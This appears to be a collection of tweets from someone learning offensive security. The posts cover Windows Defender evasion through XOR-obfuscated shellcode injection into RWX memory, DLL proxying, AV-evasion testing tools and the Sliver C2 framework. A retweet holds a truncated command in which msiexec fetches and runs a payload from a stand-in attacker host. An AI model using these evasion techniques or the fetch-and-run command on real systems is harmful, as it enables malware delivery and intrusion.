I've been diving a little bit more into defense evasion and one thing I'm learning right now is ETW and one tool that provides insight on all the providers used by it, is ETWExplorer by Pavel Yosifovich aka @zodiacon . I know, I'm late. very late.

RT @YourFinalSin: Day 144 - Bug Bounty . - Went today deep in authentication flows.- Learned a lot about different edge cases using diff….

I just released a blog post about performing a DLL Proxying via OneDriveServiceUpdater.exe. Why did I chose this one. just because I wanted to🤗. But you can perform this with any other executable the process is still the same . 🔗Link:

RT @T3chFalcon: Most people think .msi files are just installers. But red teamers know better. msiexec.exe /i http://evil[.]com/payload[.….

Who can tell me the problem here. ?🫠

Every vibe coder, right now. 🙀. The zero-day that could've compromised every Cursor and Windsurf user. (Side note) But even editors like VS Code are prone to having malicious extensions too.

I would say hands down that reverse engineering, it's the most important skill, in cybersecurity or any other fields (try to change my mind).

I don't think this type of technique is really optimal, while it bypass windows, it can make some program crash. (Open for discussion). I'm thinking of trying another simple way.

6/6 So by that i'm deducing that the memory we're overwritting might be a critical component of the process which makes it crash.

5/6 So i tried to make my program skip it and find another process, but immediately after injecting into it, it crashed.

4/6 But then I was like oh wait, maybe, it's because it gets injected into SearchApp, which pause itself when it's not used, but i can clearly see the shellcode that was written

3/6 But the process where my shellcode gets injected keeps crashing.

2/6 The executable is not being detect by the av (Ive used a xor and im using an uncommon sequence).

1/6 I've been trying a defense evasion for windows defender by enumerating RWX Protected memory regions for code injection. But have been facing a problem.

who's going to defcon this year?.

Here are some tools that I've discovered recently to test/verify AV evasion without burning my signatures: . 🔗🔗🔗 . P-S : Qu1cksc0pe, is my favorite for now🤩

RT @0x6D6172636F: .@miltinh0c in shambles.

Tweet 6/6 Useful resources: .🔗 Official docs: 🔗 Other open source C2s: 🔗 Installation guide I used:

Tweet 5/6.👉 Sliver uses msfvenom (linked to Metasploit) for shellcode generation (I didn't really divorce, keeping my options open. 😂) .👉 By default, implants will be detected by AV - disable Windows Defender for testing .👉 Requires MSF 6.2+.

Tweet 4/6 Key features for those who want the specs: ✅ Multi-platform support (Windows, Linux, macOS) ✅ Multiple transports (HTTP, HTTPS, mTLS, DNS, WireGuard) .✅ Feature extensions via "Armory" .✅ Much more (honestly, I haven't finished experimenting myself 😂).